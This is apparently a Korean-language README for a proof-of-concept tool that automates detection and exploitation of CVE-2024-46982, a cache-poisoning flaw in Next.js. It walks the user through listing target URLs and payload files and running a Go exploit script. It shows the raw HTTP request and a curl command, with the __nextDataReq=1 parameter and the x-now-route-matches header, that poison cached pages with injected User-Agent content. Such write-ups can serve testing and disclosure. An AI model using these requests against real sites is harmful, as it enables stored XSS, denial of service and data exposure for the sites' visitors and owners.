
POC CVE-2024-46982
이 도구는 Next.js의 캐시 포이즈닝 취약점인 CVE-2024-46982의 탐지 및 익스플로잇을 자동화합니다. 이 취약점은 서버사이드 렌더링(SSR) 응답이 정적 사이트 생성(SSG)으로 잘못 캐시되는 문제입니다. 이러한 구성 오류는 저장형 XSS, DoS, 데이터 유출로 이어질 수 있으며, 공격자가 캐시된 응답에 악성 콘텐츠를 주입할 수 있게 합니다.
targets.txt 파일을 생성하고, 한 줄에 하나의 대상 URL을 입력합니다:
https://vulnerable-site.com
https://another-target.com
payloads.txt 파일을 생성하고, User-Agent 헤더를 통해 주입될 페이로드를 입력합니다:
다음 명령어로 컴파일 및 실행합니다:
go run exploit.go -f targets.txt -p payloads.txt -d 5
GET /poc?__nextDataReq=1 HTTP/1.1
Host: vulnerable-site.com
User-Agent: <PAYLOAD>
x-now-route-matches: 1
다음 curl 명령어를 사용하여 악성 요청 전송:
curl -X GET "https://vulnerable-site.com/poc?__nextDataReq=1" \
-H "User-Agent: " \
-H "x-now-route-matches: 1"
브라우저에서 엔드포인트 방문